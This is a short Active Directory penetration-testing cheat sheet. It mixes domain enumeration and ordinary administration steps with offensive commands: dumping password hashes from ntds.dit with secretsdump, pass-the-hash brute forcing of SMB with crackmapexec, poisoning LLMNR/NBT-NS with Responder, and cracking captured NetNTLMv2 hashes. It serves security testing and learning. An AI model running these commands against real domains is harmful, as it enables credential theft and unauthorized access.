Active Directory Pentesting

Last modified: 2023-07-19

Active Directory Privilege Escalation Windows

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.


Seatbelt is an enumeration tool.

From Outside

# Domain Controllers (DNS) discovery
dig @<target-ip> <domain-name> any
ffuf -u -w subdomains.txt -mc 200,301,302,403
gobuster dns -d example.local -w subdomains.txt -t 25

# Dump password hashes from ntds.dit and system.hive
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL -outputfile hashes
# If we want NTLM hash only in dumped hashes, cut each line.
cut -d: -f3,4 hashes.ntds > hashes.txt
# We can use the file for brute forcing SMB credentials. For example,
crackmapexec smb <target-ip> -u <username> -H hashes.txt

From Inside

# List all users in the AD domain
net user /domain
# Specific user
net user <username> /domain
PS> Get-ADUser -Identity <username> -Server -Properties *
# Filters
PS> Get-ADUser -Filter 'Name -like "*michael"' -Server | Format-Table Name,SamAccountName -A

# List all groups of the AD domain
net group /domain
# Specific group
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server -Properties *
# List the group members
PS> Get-ADGroupMember -Identity <group> -Server

# List the password policy of the AD domain
net accounts /domain

# List AD objects
PS> $ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
PS> Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server

# Retrieve information about the given domain.
PS> Get-ADDomain -Server

# Change the password of the AD user
PS> Set-ADAccountPassword -Identity <username> -Server  -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)

# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\\SYSVOL\

Microsoft Management Console (mmc)

To setup the AD, follow this instructions:

  1. Right-click on the Windows icon.
  2. Click "Run" and enter "mmc" then click "OK".
  3. In the MMC, click "File → Add or Remove Snap-ins".
  4. Add all three "Active Directory…" snap-ins.
  5. Right-click on the "Active Directory…" in the left pane and select "Change Forest".
  6. Enter the domain as the Root domain and click OK.
  7. Click on "View → Advanced Features".

Naming Convention

If we found usernames list in Active Directory, we can modify usernames with naming convention.
For instance,

john smith   -> jsmith, j.smith
michael pole -> mpole, m.pole

SSH Login with AD Credentials


Inject Credentials into Memory

# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe

DNS Configuration

# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

Now check if the configuration is set correctly.


Basic Knowledge

User Management

  • Delegation

    In Active Directory, the administrator delegate another user to manage users over an Organizational Unit (OU), without the admin privileges.

    1. Setup

      1. Open "Active Directory Users and Computers".
      2. Right-click on the target OU, and click “Deligate Control…”. Then the new window will open.
      3. In the window, input username who you want to delegate the privilege that manage users.
      4. Select tasks to which the delegated user should manage.
      5. Click OK.
    2. Manage Users

      1. Logon as the delegated user.

      2. For instance, if you want to reset the john's password, execute the following command in PowerShell. Then input new password in prompt.

        Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
      3. The first time John logs on after that, we want John to change his arbitrary password not the password you entered. So that to, execute the following command.

        Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
      4. Now when John logs on he will be prompt to change a new password.

Intercept NetNTLM Authentication

Start Responder to listen for any LLMNR, NBT-NS, WPAD requests.

sudo responder -I <interface-like-eth0>

Leave Responder running until receiving some requests.
If you get NTLM hash, crack it in local machine.

echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt